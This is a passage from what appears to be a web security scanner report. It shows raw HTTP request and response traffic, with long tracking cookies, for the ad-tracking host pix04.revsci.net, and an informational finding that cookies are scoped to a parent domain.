Set-Cookie: rtc_8VB0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4U+huXIQJ/AtY6gq+ml3T522uq5fRa4Xl2IwC5pim60ULm4HkQFsDVUZb5s2bLbFAQa1ZjEquwXyfGbWgIgdWaSS+YL6aC9Cc9VrqnipdbQjQZqCI+i4H2RQuUiHzLH2f2t3vGSKBCGuE0fpC2g/YwGZjgijJBW08L1WYocE1dH+lTU9IBr2Oj68jTvfCUcHOej76WSxhGuTdIIxYX7seXBkpRZI9DNKm8027exigdKxn8B2EzPbsTOL5V3lu9SwJhzoWWC8bIqnRpvYn/3n4CnotMSgpUYD5SX2TtWMY7kLtxS0FNLUSejpIcqkw3sUOqfRHlA69f7HNHAFg63CYMpNOWp8awin87czgo8z42yreyQR+PoY9kqjdQywB/DaYtUWH9iGtXEpQWyGvNw/f/uW94R6FhBhhXeE7B/tFKAx+ZaDhVSI1sd1JiFQ6+efecO48Oebl3jSE3Qhqnwn/TF3LDsOcV5MRV8McouKPiXjnqC/mBxMJROkv11ihtmv2ixHiCWo/tCPbYpyWjndi0qN2RS5IWUCgijCuKVSm6EEenK3faNTf8D9VT2XtD4VHgfEIfTyR2TnNik0lumEwIUx2YDt13iYwl2svI6nlMtRzdeHuD/XUtAAWMYWdja32FzBgbAGZXs8ek2oGMo278yaXwaQ8kaMdUqOtYgZc9f9jvFyGGFy9DCIi4I3Z/s2ow5xwm1NR67xk3oB+/4AfSutJR8Od2/VGjOOo2hXwpl2pj5r+hne2lTd+iiaix7TFcD3U9OvKCdj4C17oR9bnws2PtE1yc6iPaLsJL1gP7w6VLqi+KeBfOg6IRZY/rMIrVglMuOQjEPMwHfF+M8zT1gmmQ9KGvpW3eRyTACANqO/; Domain=.revsci.net; Expires=Fri, 11-May-2012 13:33:53 GMT; Path=/
Set-Cookie: rtc_DAUd=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 13:33:53 GMT; Path=/
X-Proc-ms: 4
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 13:33:52 GMT

GIF89a.............!.......,...........D..;
8.60. http://pix04.revsci.net/J10982/b3/0/3/noscript.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J10982/b3/0/3/noscript.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J10982/b3/0/3/noscript.gif?D=DM_LOC=http://lotame.com?2716=T HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zMTMmcHhpZD01ODE1JnB4aWQ9MTAwMSZweGlkPTUzJnB4aWQ9NDcyJnB4aWQ9NjA0MQ%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; rsiPus_qbvO="MLsXrrEOpxpv55DW8tahZ2a57v4BlC60cICOgIfdHU7gwI+bhP0TqX40neBrVzd04YF7hotNL+h4vvc66tVVUjceSeakCP8FKl+7vpw/cPKd8tMu3PMCPoyxK8+ZjwDWyB3QMrpomCL0QiC5Kvy/YgnB8KTN7G9dLpnN5M3RK+PP1zwMehHWmM2JccWRv5ZmhNfQmN/YDBU94E+biCIoa0pKkv2eA2x+zJ1SCIL380rO+L9Lk2iLRCLsePDloY4CaZKvkWcnHN4spMzHQnUA9nMhOsrooPww0kmF/1pBhtUOQIGwwBNshy3r9jL9DmeVgwo+si4cw2GLg+UiObBCYgDoqFuF17tgWtie8ndkcM4/dxQZHmAVAFp6Cd4+NKEDE1ApHgzdWMCRN3mtXvTF3dagjo97ZcxX3TK0H5gNZL/tX25K+rZRwN8wPyK9oLx40INCM6m5859n+iEwb4c3uHEIWIExaGsanUSO3meucYKt8SqtiIB1ZKfcV2EWnE5l0JI9ym05H0J1D++1YxD2YWIf3FMp0ODLJXHC5LJl8HAXM9kRR0eUwpIWZ43I4Sxu/ghMwCqycSGD5P5qCz+NfB7cpFNnCm/MZxXAtHhkwlvld7DwvFMTxzkmteonO6+tWDCvSgxfKLeBCsnh7/g2pdMlW86tZQUhX+5vIkdTKTAbn/ygJRg0T3sdyAIGgf6VindVNH18jDokISc3IGyw/B24wJC4km6cNzLCqq3zgXP3vffJqf4px62L8VMyvj3CaMObL1w9lE2lhd4iKvN3GccP1FcTweH5kHDsZZBw7FHK1W7K9ytiQtKzGQRCBtx0rurYuoXmj+tBMHYIGgQGQbpACUKiwMwgO11XDJXNsqWXOeTs409iMvRAAhFR3MmxY/Ai8JtqiI6b0Q1+g1WTMqPGi0honF4/t46uL9iK78Kt/amFrG5zPGbmiPmMFkLKl9wLroTlxm+6qkNbYbThc0/QKEKH9b1zlGLxfdlc3hqznACvxpp0ybDR66WjOYSYr5GJsa1Cu2wcBHbKR1AxsYBzoLba+u6l87gczye8xuTrYhFfwlnHydy7IYalgPJBk32vZgWW2CXqypZtqnwMKkA2NoSDvvRLOZsd5s2E5nriVmz0A020hMNet6ezR0BbsbFJkikbhD25+D5hxe38KqYGvD586gb8nEzI0j5isfTJ/lkLrhbQFBZeshLI9NVhvhrxY3ujvMVlKz2TG/zsc7BVzk9fFPtT7mgROfudWRI+VvwrnXNE2vCSQzOJZeEAKPJctLVBCeeH5f0I+bMVOeVLPDBFeBnbAN+UOthqW+XB3wOga/8nLvsjoupDcwH+hneOk/D89Naxn/NKF3MEN04OWc1SJ6wrzqU6VhG4EvS+Zv+fJ8Gt98W7PtFLVLD0oQ=="; rsi_us_1000000="pUMV4ylDPxYY7RUCt3RYS68XU2Z/uOqvJR0SNgYO9rFAJiyyAu+FxS1Z30ODwyEFcoEx3T1Eetffz3Mf20XkwCrwYFLZZJxtyzGTJat2XTjlIN8P+hQPSL5K9zsL+kusRTvgKYlhihBhqZKK6GKen73oVAV9BWGkbl//D/fTGMFsID28cq6D7duOtAY3S7ThixmzbEOMxOHaa0VO3cDkKGVKS9qitOaUYlvgkLY1MKDOtODLrFUkILMlSRpCe7+47YCa4Yvgfmntw+kxPheKq6wDe8Fd8gOqjo+YsYcbcBetJ/UlUtydzNb+VQfdT8dEj/2h41IZ5vmY/5vsAZW1gUJs43Y9iklV1tAb9jY/G3Rk4zy39xByfOtBbqnZZm8zU97WhpjXwdwTrCSEuJ4CNdY/fhO3f+aPVPTKG9RnYRL0QJ4kFGhThODFPtf76e2qY1SQ9slSHrnY01CTJTrHMxySjJKQAVAr1obI8ilzYsPlaT1OSvYVS9TK9PoGrO5Jx5bXw/zwwE6Wrxwt7KjBiQjMb8pc2/6daLQ71r2XwEeaREz3clc3XYbmXIZKYmXXjpSqe6jB0kwcSkFst/ViDZpkDsFltV4ci5YQ/eJMqmyKrF/0uup6pq93xJKQibeBPvkCxBjBIGLPE6+meOzdSPUPxAyoXPah9kyi7C70w/Ic06E82HDgxMfptenJH+QxMcJPPGsyFAVT+6SBuOjuKJ5KYDNUBXyxL2dg7B2oqDAiqh1W+megWtR3XoJXxE+b3k70BKlvT5YvEuZ0/RALqrZKe/52guDCx1yv8IEqB3NuIb5M9E0P1eLplz4HhYGMt1XJa6PPDxd4ljqvSFEQClJtagh9UzDEFg6Cb5LdDadrKiwtHRl62r3F/lJB8Wq3syJAxzEPLO4bM0VnXvq5faJnoE+6gBD5yjyVDaOWRfQzLGIWkNHa+f2KJvAyTQlC4oHYQZOGM/cVc3WrnRQmj1KDwCk/46Dq6gu9fFpETdaKz7DpE5AVcVASeUiRu6t0E9gdbxRFlQnHfQxlj0O0yv/8sVDJfLtBv7VEv6KvS85d/vyrS+3/lJtowlLX877yZqlnDrYhsgIzJ/B2kGU/Y2tWcJtJNzrSLvL6uC6zAE3YCN+2b8ZfetlvToWWUxLm+kOAX5sNQa84+z+Y7BiXKA28ArWYuR2BzhZYqV+lNsl8IuYWHrQEhBevE6yTgfXBfZ5ZWDuef3muciM4uxq9eRevsktzwd4ZolhUro4q9RDXzP+z/Jt3SlkekF3F1UyZn5rEt9sK3VhPrPz7bFs0pGO/fShWwUhEJGkkGofDmr7oO9xVS0wlWlGR+HiZLLiNXtFztdl/InifBdzZrv7tEgPT/Ekl1qqx4lzM76Hls1fjGRalSthbIGWedXoj3t9T64fqUJnYWdom7ygUV4OI6Uek4g2aJV2sE2HBrV7ibQMfkHW6H2qlf/AvGzXk5juIW8AOsU6N3bJugxzerwleYqkN4SEXHO2TsUUB2Hii30ULmVN5KVwl4AT7t07WbQfIgUgh+J4zgAJSZ1//mvY7cAo2t7r+WZ+3UqK9EVFlB88NDlOgh4Jm3SdKvwyEx2VIxC8FQZezWpUIHfmHUohseSJ3s3QYI0FyZt+UimHMdHcAt0unq75eibm7XCXgvJjZ8QEa2uTso9gthoSRwjtm4zJD8KuDs9Dol9dL10gwkePtd9XjMMl1IiMfHEGPMzYrTXatfWNnptioKHatYztwbz3JzwC1e1SaBMwSq2wE51biaKnVTIX7gjw1dfMUEcH+SSwe4EKfaZDW3Y8jNtoFzFv7v+gK3Q=="; NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b096&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39CEJZjpv597JwHIRxS7gdG4nwPAq6ZuDH+vX93uE8x+80+EqavgLMjsVMcRzx4ED/5sU/DdHAgOy6ZFF6u9krYB07BFG6K2gCx9zATNAOyKPGfTqVHvkpDwSF+KJXhEbXYpBgIjd3IWX3TqLfPz6jE8vTUf3pdaWUiZB3YUWt0CiIC5F0X3tPgb/SivyvtveJcRXnIKv7kXwRgYvCvr55V+AZTEVXPZ4e3YCovCIOgMpRBSkPQefrNyf8+fevxeSnnxLtLBTd7bn/zQn98TJd0YWeOHbFIVzmnJlL/meZ5F8yEzm7HiS+gYXKCqjfBEgEJXe7pa4nhHi/FyghIrWjtv72jtBRuTmEa1PtCcp9wfqOSXME/TC3DDlgc0Ij565ULgb+NLzIZ6TpI8vIyqOkYR2CJSFdZdVnBUG0ncgAuL4be/4qG/lpeLJAr4R2ZcdSh9ENtyBu0UsstxyoNHHwBT0SxG1olEQxWdxat7mSTK4NzNH7bvJyyZeNxeZoviFwczbub9BMnSayVKnrf8mLmZYn0G+URiIr9to1aqeDG6xKYVAmQwGVEGKynGOyuqpwObt+MyvmywUWEZ1qy3YzLOSZi95dlvgQqf5nm2jI0E/rWzPceCg9nrDXdY5aA2KiG6/Ag/Qtn9BE0P6tHnl8GXHStyZrY4yXNhIUbljw44dlYagYpCHt4M3J4bPZG8YwZUp0ecARePUDtezFyfvRsc1iatb1pDP+cq/6Iul6LmWpIrzCvxlo9THyXVf5SG33tg9Lw2R/Ro5VrxlHAMqi5EG0xBZZuKHWEnXQrAXGw8FaURhjx71p9CkHtHT1BpsJC15G4HDCuuHnAqa2MRPkYaEZL2cVa7b84SiSmL76sma6ZAVTmsWibG6oMtgf+rO6uurjCoZJ5OCsW83NGfMcjZCzPl33xUGXappEWzObGyaUvOz7ose722NuQ6CgmfMlORcS+CfKwXULjWH6Zy36QCvGrnsM/T/4K0FLlEQnA/ZrpS8O/uyK8UlrSZbknpF5SKlqTmNy5yEGuQ4SS+qP+oPyRgWbGkd6TLhbS8wVZYRN53ZAc0jxNNVRDNVFRE9QSI2VrlZ/Ka1RizjzXzy0Mrq6kcHNlCK91uDwhC94dfZh3mu4LEbkhOgwvScvmwGeZy8gGWoQEjk0gAgb9SgQmtGBl5C+T7TrdHq6EejqJkS0OH/st2RxRBZGNqPJSPFO3Z9nkwH7dr0G89yU1lVThr9TPeyrKuuQlOnafjtcNVr+buGb3emJOGcjzfH90v2UdAQiKm9gZ6BDbLaq/nbVWxP/5HqWbZLa2/RS2GM94ibxZPKXwTQTSnoK6758zl7N8nLPQGrb7mauaNrJ0v4zNciOQWnVNzZaqhQO8UVgcjuWrUQiJTPQWDKxu4w8eoM53ZEdNIh7WnKbwDRVqkqD0y1KsGwOeg2fZkSaLcNFed69lS3DYgh37CBN1ozAybkSybs/DUjRL93JTQZlPIkdLkbJkhmGdhN2G2Xb4uomwrwx4xxkHDHG3BOj3sObWJNvojJs1Id/pPS2nPanvOm; rsi_segs_1000000=pUPF4j+huXIMH/C1v6FY5BBd22rQpqLhiqlfIGbg2pRiGwm2jLwjIZFNNncjloepKzF/B7fp/+SiGckQVLZSUTzj+4nBTYXuaiE2tboFoduZMg7DSfUQB6FE1zRWJ+JvnSM1QD/k1XGhHkLUgfDglit43hQFSUdHZJQSF53dKeKpN03eWE72VWj94BYjKTKN4L5Gwnt49kCfh4NX7Yupc8UIFDwNI2isE3jpy0Z7wVsuEt0AN6YPkEqTgQJCsJJ5QLcDtJEjeEElVwj2YS8+lkKzwpyUI+2OfxsO9qLeDmS4gNcdZsjN4X19hWG1EiefKKrQTnrgfI2IbbKzqrq8B06xUCuyS17v2CqRmS/dR+ZVZLNzO+qTBmUan9sKf1aCfEUTbHrsGEBh/kvJf6NZ5+UCBAgcq8pCii7a1bjsTzDGJwXRkSOHGtcJMZDh7/vql+KiRy8RgLyoynfCecVnrMnX1/v5cLd7dcSf2V0MYoiKPj3igqC/WBlMJa2kv3tivIQ3xJEJfWcn1IBDsEdychtCkzQZsqTjxB9rvaqygIfyDjPOK6lhn9xe9T7aGjAiI4K4iYfX2ws6sTwgL6cxMozoADzDlq+buBNOcY5Wi46voIO8IrwxEngkS02HbCdQCzSFT+iHt8XLHFMKuEo7pWFl3mS/AG0E6hSb3BlIofGveAoXng5LgAxvUbuQSYxUYeEYrZzrKZBj2KL/7uwC9qtVal+8MEpiXMq8LVTcEMTN8UQwTA7i4KHj5ovQSYN+XrnJESi2chF8GQewHz663m/zLekom6H2INVNC5q6rLxiFcwNagMSoxAWwAKjC4kAjh7qyWGICQRXqvM=; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4df0ca7b&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dca0a20&271d956a153787d6fee9112e9c6a9326; rtc_Wpvi=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_Wpvi=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4U9BenIMH/AtZKgq+hMq9rGiLObgpWFak32IrQMGnmfHuiYgDQaAwxUK6pw26DoqxCfW+eqapBmXPvrSCTB7imSFpaF3jgTKu6gUiM/MJRCfSdEcMdPs9/RVdVv7DqMTpKG3eKUxCc7lJ3d4uPsvbVf83JLReyHT0jN1BuyEb58GYv/LxKgpVexexquZuKeRToBghnCuFqedwf+X0+YnFkDWagD0BMcPYulELz0Mu1DalYUSGBXMWxkRYfFMQRdUKkHhG90juoC8zukmR3XUhPkj00YpF2v5czJRQ8SR6gaizuiNEQ+QtZ7WfXUMko8jtDXzRUtxNTBAMkLNRQ+XzDyirDhbvazbS8/7gtzWJyWfk5KsLPx7Q9qP5kzmdWUwW7lRqclR7mqeBoqC+Rg6F3yUB1cjUA0C1JAB1EfFSLXDDMBO/VGddHz6BEQZtg7jVMyyHWkklB/ylhn57DgGhka9RgfFaGog+TI+efabH1jyM9UzezU4kE4ezjmSqfcV/LT639exN2dv6SNc8xX6vec6TwgSyBCXX5NpkJUYs2u7Nc+dQuAslSekP8ytibSAnkix/CLYCkJHM95uu6RAjhu14tfA6zktTgYsuOV8x3odnKGudu22ET3e9sTjq7QkGROT3nxOPXPfZ8/cJSmEtYP4g7BZg1/NAm3WBms1r04ODz8Z6iGFw8vqqeoO8AFIwRroRSClNoIiSch9DCbalqeyJJ8LB0sJS1wG4nBUO2j6NmimsJvP78/PqfzBYrjnVw2xys5nCR829DnRtFNHTrduQPNWAPdVcerXhuIh3n/PEjH4JxD14Wa6dO0AHjPeWmLIcrJpp6rgVQBrWNjuKtQKfQbZ+nLdNJOl; Domain=.revsci.net; Expires=Fri, 11-May-2012 13:31:34 GMT; Path=/
